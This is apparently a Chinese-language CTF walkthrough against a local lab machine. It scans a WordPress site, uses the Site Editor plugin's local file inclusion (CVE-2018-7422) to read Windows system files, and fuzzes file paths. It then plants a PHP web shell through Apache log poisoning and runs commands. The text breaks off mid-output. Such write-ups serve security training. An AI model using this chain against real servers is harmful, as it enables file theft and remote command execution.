\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ sudo rustscan -a $IP -- -sCV -Pn\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\nOpen 192.168.10.102:445\nOpen 192.168.10.102:5985\nOpen 192.168.10.102:8080\n\nPORT STATE SERVICE REASON VERSION\n445\/tcp open microsoft-ds? syn-ack ttl 128\n5985\/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Not Found\n8080\/tcp open http syn-ack ttl 128 Apache httpd\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-title: Did not follow redirect to http:\/\/tripladvisor:8080\/wordpress\/\n|_http-server-header: Apache\n|_http-favicon: Unknown favicon MD5: 3BD2EC61324AD4D27CB7B0F484CD4289\n|_http-open-proxy: Proxy might be redirecting requests\nMAC Address: 08:00:27:BC:3F:CE (Oracle VirtualBox virtual NIC)\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| smb2-security-mode: \n| 2:1:0: \n|_ Message signing enabled but not required\n| smb2-time: \n| date: 2025-06-04T04:07:56\n|_ start_date: 2025-06-04T18:59:30\n| p2p-conficker: \n| Checking for Conficker.C or higher...\n| Check 1 (port 59001\/tcp): CLEAN (Timeout)\n| Check 2 (port 57067\/tcp): CLEAN (Timeout)\n| Check 3 (port 10647\/udp): CLEAN (Timeout)\n| Check 4 (port 41420\/udp): CLEAN (Timeout)\n|_ 0\/4 checks are positive: Host is CLEAN or ports are blocked\n|_clock-skew: 3s<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u53d1\u73b0\u5b58\u5728\u4e00\u4e2a\u57df\u540d\u89e3\u6790\u4ee5\u53ca\u8df3\u8f6c\uff0c\u770b\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ sudo vim \/etc\/hosts \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ cat \/etc\/hosts | grep $IP \n192.168.10.102 tripladvisor\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl -I http:\/\/tripladvisor:8080\/wordpress\/ \nHTTP\/1.1 200 OK\nDate: Wed, 04 Jun 2025 04:13:53 GMT\nServer: Apache\nSet-Cookie: PHPSESSID=npdfldo41ae5urlct2d4lb3114; path=\/; HttpOnly\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nPragma: no-cache\nX-Pingback: http:\/\/tripladvisor:8080\/wordpress\/xmlrpc.php\nLink: <http:\/\/tripladvisor:8080\/wordpress\/wp-json\/>; rel="https:\/\/api.w.org\/"\nLink: <http:\/\/tripladvisor:8080\/wordpress\/>; rel=shortlink\nContent-Type: text\/html; charset=UTF-8\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ sudo dirsearch -u http:\/\/tripladvisor:8080\/wordpress\/ 2>\/dev\/null \n\n _|. _ _ _ _ _ _|_ v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460\n\nOutput File: \/home\/kali\/temp\/TriplAdvisor\/reports\/http_tripladvisor_8080\/_wordpress__25-06-04_00-14-55.txt\n\nTarget: http:\/\/tripladvisor:8080\/\n\n[00:14:55] Starting: wordpress\/\n[00:15:18] 404 - 1016B - \/wordpress\/%2e%2e\/\/google.com\n[00:15:18] 403 - 1004B - \/wordpress\/%C0%AE%C0%AE%C0%AF\n[00:15:18] 403 - 1018B - \/wordpress\/%3f\/\n[00:15:33] 403 - 1004B - \/wordpress\/%ff\nCTRL+C detected: Pausing threads, please wait...\n^C\nTask Completed<\/code><\/pre>\n\u6ca1\u626b\u5230\u5565\u6682\u65f6\u653e\u5f03\uff0c\u5982\u679c\u7b49\u4e0b\u6ca1\u7ebf\u7d22\u518d\u626b\u63cf\u3002<\/p>\n
wpscan\u626b\u63cf<\/h3>\n
\u53d1\u73b0\u5b58\u5728\u535a\u5ba2\uff0c\u8fdb\u884c\u626b\u63cf\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ wpscan --url http:\/\/tripladvisor:8080\/wordpress\/ --api-token XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n_______________________________________________________________\n __ _______ _____\n \\ \\ \/ \/ __ \\ \/ ____|\n \\ \\ \/\\ \/ \/| |__) | (___ ___ __ _ _ __ \u00ae\n \\ \\\/ \\\/ \/ | ___\/ \\___ \\ \/ __|\/ _` | '_ \\\n \\ \/\\ \/ | | ____) | (__| (_| | | | |\n \\\/ \\\/ |_| |_____\/ \\___|\\__,_|_| |_|\n\n WordPress Security Scanner by the WPScan Team\n Version 3.8.25\n Sponsored by Automattic - https:\/\/automattic.com\/\n @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n[i] It seems like you have not updated the database for some time.\n[?] Do you want to update now? [Y]es [N]o, default: [N]Y\n[i] Updating the Database ...\n[i] Update completed.\n\n[+] URL: http:\/\/tripladvisor:8080\/wordpress\/ [192.168.10.102]\n[+] Started: Wed Jun 4 00:18:14 2025\n\nInteresting Finding(s):\n\n[+] Headers\n | Interesting Entry: Server: Apache\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] XML-RPC seems to be enabled: http:\/\/tripladvisor:8080\/wordpress\/xmlrpc.php\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n | Confirmed By:\n | - Link Tag (Passive Detection), 30% confidence\n | - Direct Access (Aggressive Detection), 100% confidence\n | References:\n | - http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner\/\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos\/\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login\/\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access\/\n\n[+] WordPress readme found: http:\/\/tripladvisor:8080\/wordpress\/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] Upload directory has listing enabled: http:\/\/tripladvisor:8080\/wordpress\/wp-content\/uploads\/\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] The external WP-Cron seems to be enabled: http:\/\/tripladvisor:8080\/wordpress\/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n | - https:\/\/www.iplocation.net\/defend-wordpress-from-ddos\n | - https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1299\n\n[+] WordPress version 5.1.19 identified (Outdated, released on 2024-06-24).\n | Found By: Emoji Settings (Passive Detection)\n | - http:\/\/tripladvisor:8080\/wordpress\/, Match: '-release.min.js?ver=5.1.19'\n | Confirmed By: Most Common Wp Includes Query Parameter In Homepage (Passive Detection)\n | - http:\/\/tripladvisor:8080\/wordpress\/wp-includes\/css\/dist\/block-library\/style.min.css?ver=5.1.19\n | - http:\/\/tripladvisor:8080\/wordpress\/wp-includes\/js\/wp-embed.min.js?ver=5.1.19\n\n[+] WordPress theme in use: expert-adventure-guide\n | Location: http:\/\/tripladvisor:8080\/wordpress\/wp-content\/themes\/expert-adventure-guide\/\n | Last Updated: 2025-05-09T00:00:00.000Z\n | Readme: http:\/\/tripladvisor:8080\/wordpress\/wp-content\/themes\/expert-adventure-guide\/readme.txt\n | [!] The version is out of date, the latest version is 2.3\n | Style URL: http:\/\/tripladvisor:8080\/wordpress\/wp-content\/themes\/expert-adventure-guide\/style.css?ver=5.1.19\n | Style Name: Expert Adventure Guide\n | Style URI: https:\/\/www.seothemesexpert.com\/wordpress\/free-adventure-wordpress-theme\/\n | Description: Expert Adventure Guide is a specialized and user-friendly design crafted for professional adventure ...\n | Author: drakearthur\n | Author URI: https:\/\/www.seothemesexpert.com\/\n |\n | Found By: Css Style In Homepage (Passive Detection)\n | Confirmed By: Css Style In 404 Page (Passive Detection)\n |\n | Version: 1.0 (80% confidence)\n | Found By: Style (Passive Detection)\n | - http:\/\/tripladvisor:8080\/wordpress\/wp-content\/themes\/expert-adventure-guide\/style.css?ver=5.1.19, Match: 'Version: 1.0'\n\n[+] Enumerating All Plugins (via Passive Methods)\n[+] Checking Plugin Versions (via Passive and Aggressive Methods)\n\n[i] Plugin(s) Identified:\n\n[+] editor\n | Location: http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/\n |\n | Found By: Urls In Homepage (Passive Detection)\n | Confirmed By: Urls In 404 Page (Passive Detection)\n |\n | Version: 1.1 (100% confidence)\n | Found By: Readme - Stable Tag (Aggressive Detection)\n | - http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/readme.txt\n | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)\n | - http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/readme.txt\n\n[+] Enumerating Config Backups (via Passive and Aggressive Methods)\n Checking Config Backups - Time: 00:02:52 <==============================================================================================================> (137 \/ 137) 100.00% Time: 00:02:52\n[i] No Config Backups Found.\n\n[+] WPScan DB API OK\n | Plan: free\n | Requests Done (during the scan): 3\n | Requests Remaining: 22\n\n[+] Finished: Wed Jun 4 00:21:38 2025\n[+] Requests Done: 186\n[+] Cached Requests: 6\n[+] Data Sent: 56.919 KB\n[+] Data Received: 13.771 MB\n[+] Memory used: 269.586 MB\n[+] Elapsed time: 00:03:24<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u7ec4\u4ef6\u6f0f\u6d1e\u5229\u7528<\/h3>\n
\u53d1\u73b0wordpress<\/code>\u7684\u4e00\u4e2a\u7ec4\u4ef6\uff0c\u4e0d\u77e5\u9053\u662f\u5426\u5b58\u5728\u6f0f\u6d1e\uff0c\u8fdb\u884c\u67e5\u8be2\u4e00\u4e0b\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ searchsploit editor 1.1 \n----------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path\n----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Amaya 11.1 - W3C Editor\/Browser 'defer' Remote Stack Overflow | windows\/remote\/8321.py\nAmaya 11.1 - W3C Editor\/Browser (defer) Stack Overflow (PoC) | windows\/dos\/8314.php\nCMS from Scratch 1.1.3 - 'FCKeditor' Arbitrary File Upload | php\/webapps\/5691.php\nDjango CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting | python\/webapps\/40129.txt\nDrupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x\/7.x) - Persistent Cross-Site Scripting | php\/webapps\/25493.txt\nMaximus CMS 1.1.2 - 'FCKeditor' Arbitrary File Upload | php\/webapps\/15960.txt\noXygen XML Editor 21.1.1 - XML External Entity Injection | windows\/local\/47658.txt\npragmaMx 1.12.1 - '\/includes\/wysiwyg\/spaw\/editor\/plugins\/imgpopup\/img_popup.php?img_url' Cross-Site Scripting | php\/webapps\/37313.txt\nSimple Machines Forum (SMF) 1.1.15 - 'fckeditor' Arbitrary File Upload | php\/webapps\/36410.txt\nWordPress Plugin Site Editor 1.1.1 - Local File Inclusion | php\/webapps\/44340.txt\nWordPress Plugin User Role Editor < 4.25 - Privilege Escalation | php\/webapps\/44595.rb\n----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results<\/code><\/pre>\n\u770b\u8d77\u6765\u6ca1\u5565\u5934\u7eea\u554a\u3002\u3002\u3002\u6362\u4e00\u4e2a\u5de5\u5177\u518d\u626b\u4e00\u4e0b\uff0c\u770b\u770b\u662f\u4e0d\u662f\u6f0f\u4e86\u5565\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ cmseek -u http:\/\/tripladvisor:8080\/wordpress\/\n___ _ _ ____ ____ ____ _ _\n| |\\\/| [__ |___ |___ |_\/ by @r3dhax0r\n|___ | | ___| |___ |___ | \\_ Version 1.1.3 K-RONA\n\n [+] Deep Scan Results [+] \n\n \u250f\u2501Target: tripladvisor:8080\n \u2503\n \u2520\u2500\u2500 CMS: WordPress\n \u2503 \u2502\n \u2503 \u2570\u2500\u2500 URL: https:\/\/wordpress.org\n \u2503\n \u2520\u2500\u2500[WordPress Deepscan]\n \u2503 \u2502\n \u2503 \u251c\u2500\u2500 Readme file found: http:\/\/tripladvisor:8080\/wordpress\/\/readme.html\n \u2503 \u251c\u2500\u2500 License file: http:\/\/tripladvisor:8080\/wordpress\/\/license.txt\n \u2503 \u2502\n \u2503 \u251c\u2500\u2500 Plugins Enumerated: 1\n \u2503 \u2502 \u2502\n \u2503 \u2502 \u2570\u2500\u2500 Plugin: editor\n \u2503 \u2502 \u2502\n \u2503 \u2502 \u251c\u2500\u2500 Version: 4.3\n \u2503 \u2502 \u2570\u2500\u2500 URL: http:\/\/tripladvisor:8080\/wordpress\/\/wp-content\/plugins\/editor\n \u2503 \u2502\n \u2503 \u2502\n \u2503 \u251c\u2500\u2500 Themes Enumerated: 1\n \u2503 \u2502 \u2502\n \u2503 \u2502 \u2570\u2500\u2500 Theme: expert-adventure-guide\n \u2503 \u2502 \u2502\n \u2503 \u2502 \u251c\u2500\u2500 Version: 5.1.19\n \u2503 \u2502 \u2570\u2500\u2500 URL: http:\/\/tripladvisor:8080\/wordpress\/\/wp-content\/themes\/expert-adventure-guide\n \u2503 \u2502\n \u2503 \u2502\n \u2503 \u251c\u2500\u2500 Usernames harvested: 1\n \u2503 \u2502 \u2570\u2500\u2500 admin\n \u2503 \u2502\n \u2503\n \u2520\u2500\u2500 Result: \/home\/kali\/temp\/TriplAdvisor\/Result\/tripladvisor_8080_wordpress\/cms.json\n \u2503\n \u2517\u2501Scan Completed in 19.36 Seconds, using 44 Requests\n\n CMSeeK says ~ addio<\/code><\/pre>\n\u7136\u540e\u5f80\u56de\u627e\u627e\uff0c\u53d1\u73b0\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/readme.txt\n=== Site Editor - WordPress Site Builder - Theme Builder and Page Builder ===\nContributors: wpsiteeditor\nTags: site editor, site builder, page builder, theme builder, theme framework, design, inline editor, inline text editor, layout builder,live options, live, customizer, theme customizer, header builder, footer builder, fully customizable, design options,design editor, options framework, front end, page builder plugin, builder, responsive, front end editor, landing page, editor, drag-and-drop, shortcode, wordpress, ultra flexible, unlimited tools, elements, modules, support, seo, animation, absolute flexibility, live theme options, video backgrounds, font awesome, Optimized, fast, quick, ux, ui\nRequires at least: 4.7\nTested up to: 4.7.4\nStable tag: 1.1\nLicense: GPLv3\nLicense URI: https:\/\/www.gnu.org\/licenses\/gpl-3.0.html\n\nSiteEditor is The best solution for build your WordPress site with The best drag and drop WordPress Site, theme and Page Builder.Any theme, any page, any design.\n\n== Description ==\n\n**What is the Site Editor?**\n\nSite Editor is the most powerful Site Builder which is designed for WordPress. It's a powerful, advanced, user-friendly front end editor and you can build your website via drag and drop and full live options. Site Editor is also a powerful front-end platform for the developer.\n\n**OUR OFFICIAL WEBSITE & GITHUB**\n\n[SiteEditor.ORG](https:\/\/www.siteeditor.org)\n\n[SiteEditor GitHub Repository](https:\/\/github.com\/SiteEditor\/editor)\n\n-----------<\/code><\/pre>\n\u7136\u540e\u53d1\u73b0\u4e86\u5168\u79f0\u4e3aSite Editor<\/code>\uff0c\u524d\u9762\u7b5b\u9009\u5230\u4e86\u8fd9\u4e2a\u6d1e\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ searchsploit Site Editor 1.1\n----------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path\n----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting | python\/webapps\/40129.txt\nDrupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x\/7.x) - Persistent Cross-Site Scripting | php\/webapps\/25493.txt\npragmaMx 1.12.1 - '\/includes\/wysiwyg\/spaw\/editor\/plugins\/imgpopup\/img_popup.php?img_url' Cross-Site Scripting | php\/webapps\/37313.txt\nWordPress Plugin Site Editor 1.1.1 - Local File Inclusion | php\/webapps\/44340.txt\n----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ searchsploit -m php\/webapps\/44340.txt\n Exploit: WordPress Plugin Site Editor 1.1.1 - Local File Inclusion\n URL: https:\/\/www.exploit-db.com\/exploits\/44340\n Path: \/usr\/share\/exploitdb\/exploits\/php\/webapps\/44340.txt\n Codes: CVE-2018-7422\n Verified: True\nFile Type: Unicode text, UTF-8 text\nCopied to: \/home\/kali\/temp\/TriplAdvisor\/44340.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ cat 44340.txt \nProduct: Site Editor WordPress Plugin - https:\/\/wordpress.org\/plugins\/site-editor\/\nVendor: Site Editor\nTested version: 1.1.1\nCVE ID: CVE-2018-7422\n\n** CVE description **\nA Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php.\n\n** Technical details **\nIn site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php:5, the value of the ajax_path parameter is used for including a file with PHP\u2019s require_once(). This parameter can be controlled by an attacker and is not properly sanitized.\n\nVulnerable code:\nif( isset( $_REQUEST['ajax_path'] ) && is_file( $_REQUEST['ajax_path'] ) && file_exists( $_REQUEST['ajax_path'] ) ){\n require_once $_REQUEST['ajax_path'];\n}\n\nhttps:\/\/plugins.trac.wordpress.org\/browser\/site-editor\/trunk\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?rev=1640500#L5\n\nBy providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system.\n\n** Proof of Concept **\nhttp:\/\/<host>\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/etc\/passwd\n\n** Solution **\nNo fix available yet.\n\n** Timeline **\n03\/01\/2018: author contacted through siteeditor.org's contact form; no reply\n16\/01\/2018: issue report filled on the public GitHub page with no technical details\n18\/01\/2018: author replies and said he replied to our e-mail 8 days ago (could not find the aforementioned e-mail at all); author sends us "another" e-mail\n19\/01\/2018: report sent; author says he will fix this issue "very soon"\n31\/01\/2018: vendor contacted to ask about an approximate release date and if he needs us to postpone the disclosure; no reply\n14\/02\/2018: WP Plugins team contacted; no reply\n06\/03\/2018: vendor contacted; no reply\n07\/03\/2018: vendor contacted; no reply\n15\/03\/2018: public disclosure\n\n** Credits **\nVulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI).\n\n--\nBest Regards,\n\nNicolas Buzy-Debat\nOrange Cyberdefense Singapore (CERT-LEXSI) <\/code><\/pre>\n\u8fdb\u884c\u786e\u8ba4\u4e00\u4e0b\uff0c\u56e0\u4e3a\u77e5\u9053\u8fd9\u4e2a\u662f windows \u673a\u5b50\uff0c\u6240\u4ee5\u53ef\u4ee5\u5c1d\u8bd5\u4e00\u4e0b\u76f8\u5173\u76ee\u5f55\uff0c\u6bd4\u5982\uff1a<\/p>\n
\/boot.ini\n\/autoexec.bat\n\/windows\/system32\/drivers\/etc\/hosts\n\/windows\/repair\/SAM\n\/windows\/panther\/unattended.xml\n\/windows\/panther\/unattend\/unattended.xml\n\/windows\/system32\/license.rtf\n\/windows\/system32\/eula.txt<\/code><\/pre>\n\u4ee5\u53ca\u8fd9\u91cc\u7684\u8def\u5f84\u4e5f\u8981\u6539\u4e00\u4e0b\uff1a<\/p>\n
http:\/\/<host>\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/etc\/passwd\nhttp:\/\/tripladvisor:8080\/wordpress\/\/wp-content\/plugins\/editor<\/code><\/pre>\n\u6539\u4e00\u4e0b\u53d1\u73b0\u6709\u4e86\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl -s 'http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/windows\/system32\/drivers\/etc\/hosts' | html2text\n\nSkip_to_content\nThe best travel online guide!\n\n * Home\n\n Search for: [Unknown INPUT type]\nCLOSE\n [TriplAdvisor]\n 1. Home \/ \n 2. Error 404\n****** Error 404 ******\nCopyright \u00a9 2023, Adventure_Guide | WordPress_Theme\nTOP\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl -s 'http:\/\/tripladvisor:8080\/wordpress\/\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/windows\/system32\/drivers\/etc\/hosts' | html2text\n# Copyright (c) 1993-2009 Microsoft Corp. # # This is a sample HOSTS file used\nby Microsoft TCP\/IP for Windows. # # This file contains the mappings of IP\naddresses to host names. Each # entry should be kept on an individual line. The\nIP address should # be placed in the first column followed by the corresponding\nhost name. # The IP address and the host name should be separated by at least\none # space. # # Additionally, comments (such as these) may be inserted on\nindividual # lines or following the machine name denoted by a '#' symbol. # #\nFor example: # # 102.54.94.97 rhino.acme.com # source server # 38.25.63.10\nx.acme.com # x client host # localhost name resolution is handled within DNS\nitself. # 127.0.0.1 localhost # ::1 localhost {"success":true,"data":{"output":\n[]}}\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl -s 'http:\/\/tripladvisor:8080\/wordpress\/\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/windows\/system32\/drivers\/etc\/hosts'\n# Copyright (c) 1993-2009 Microsoft Corp.\n#\n# This is a sample HOSTS file used by Microsoft TCP\/IP for Windows.\n#\n# This file contains the mappings of IP addresses to host names. Each\n# entry should be kept on an individual line. The IP address should\n# be placed in the first column followed by the corresponding host name.\n# The IP address and the host name should be separated by at least one\n# space.\n#\n# Additionally, comments (such as these) may be inserted on individual\n# lines or following the machine name denoted by a '#' symbol.\n#\n# For example:\n#\n# 102.54.94.97 rhino.acme.com # source server\n# 38.25.63.10 x.acme.com # x client host\n\n# localhost name resolution is handled within DNS itself.\n# 127.0.0.1 localhost\n# ::1 localhost\n{"success":true,"data":{"output":[]}}<\/code><\/pre>\n\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b\u5e38\u89c1\u76ee\u5f55\u5427\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ ll \/usr\/share\/seclists\/Fuzzing\/LFI\ntotal 872\n-rw-r--r-- 1 root root 254354 Feb 16 2024 LFI-etc-files-of-all-linux-packages.txt\n-rw-r--r-- 1 root root 22883 Feb 16 2024 LFI-gracefulsecurity-linux.txt\n-rw-r--r-- 1 root root 9416 Feb 16 2024 LFI-gracefulsecurity-windows.txt\n-rw-r--r-- 1 root root 32507 Feb 16 2024 LFI-Jhaddix.txt\n-rw-r--r-- 1 root root 501947 Feb 16 2024 LFI-LFISuite-pathtotest-huge.txt\n-rw-r--r-- 1 root root 22215 Feb 16 2024 LFI-LFISuite-pathtotest.txt\n-rw-r--r-- 1 root root 31898 Feb 16 2024 LFI-linux-and-windows_by-1N3@CrowdShield.txt\n-rw-r--r-- 1 root root 2165 Feb 16 2024 OMI-Agent-Linux.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ wfuzz -c -w \/\/usr\/share\/seclists\/Fuzzing\/LFI\/LFI-gracefulsecurity-windows.txt -u "http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=FUZZ" --hh 72 2>\/dev\/null\n********************************************************\n* Wfuzz 3.1.0 - The Web Fuzzer *\n********************************************************\n\nTarget: http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=FUZZ\nTotal requests: 235\n\n=====================================================================\nID Response Lines Word Chars Payload \n=====================================================================\n\n000000044: 200 7 L 13 W 129 Ch "C:\/Windows\/win.ini" \n000000043: 200 21 L 135 W 861 Ch "C:\/WINDOWS\/System32\/drivers\/etc\/hosts" \n000000048: 200 939 L 15552 W 206724 Ch "C:\/xampp\/apache\/logs\/access.log" \n000000049: 200 33746 712193 W 5744606 C "C:\/xampp\/apache\/logs\/error.log" \n L h \n000000164: 200 0 L 1 W 37 Ch "c:\/xampp\/phpMyAdmin\/config.inc.php" \n000000163: 500 0 L 0 W 0 Ch "c:\/xampp\/php\/php.ini" \n000000165: 200 72 L 319 W 2133 Ch "c:\/xampp\/sendmail\/sendmail.ini" \n000000160: 200 564 L 2563 W 21507 Ch "c:\/xampp\/apache\/conf\/httpd.conf" \n000000154: 200 1092 L 17388 W 243793 Ch "c:\/xampp\/apache\/logs\/access.log" \n000000155: 200 33746 712193 W 5744606 C "c:\/xampp\/apache\/logs\/error.log" \n L h \n000000229: 200 0 L 1 W 37 Ch "c:\/WINDOWS\/setuperr.log" \n000000227: 200 176 L 1036 W 14543 Ch "c:\/WINDOWS\/setupact.log" \n000000219: 200 79 L 585 W 3720 Ch "c:\/WINDOWS\/system32\/drivers\/etc\/lmhosts.sam" \n000000220: 200 16 L 55 W 444 Ch "c:\/WINDOWS\/system32\/drivers\/etc\/networks" \n000000218: 200 21 L 135 W 861 Ch "c:\/WINDOWS\/system32\/drivers\/etc\/hosts" \n000000221: 200 27 L 171 W 1395 Ch "c:\/WINDOWS\/system32\/drivers\/etc\/protocol" \n000000222: 200 285 L 1238 W 17500 Ch "c:\/WINDOWS\/system32\/drivers\/etc\/services" \n000000232: 200 2806 L 28871 W 227306 Ch "c:\/WINDOWS\/WindowsUpdate.log" \n\nTotal time: 0\nProcessed Requests: 235\nFiltered Requests: 217\nRequests\/sec.: 0<\/code><\/pre>\n\u53d1\u73b0\u5b58\u5728\u65e5\u5fd7\u5305\u542b\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
curl -A "<?php system(\\$_GET['cmd']);?>" http:\/\/tripladvisor:8080\/wordpress\/ <\/code><\/pre>\n\u4f46\u662f\u6211\u4f3c\u4e4e\u628a\u65e5\u5fd7\u73a9\u574f\u4e86\uff0c\u5c1d\u8bd5\u91cd\u65b0\u5bfc\u5165\u955c\u50cf\u3002\u3002\u3002\u3002\u7136\u540e\u518d\u8bd5\u4e00\u6b21\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl "http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\xampp\\apache\\logs\\access.log&cmd=dir"\n192.168.56.1 - - [14\/Aug\/2024:10:42:52 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/error.log HTTP\/1.1" 200 5728866 "-" "curl\/8.8.0"\n192.168.56.1 - - [14\/Aug\/2024:10:43:07 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1" 200 272 "-" "curl\/8.8.0"\n192.168.56.1 - - [14\/Aug\/2024:10:44:38 -0700] "GET 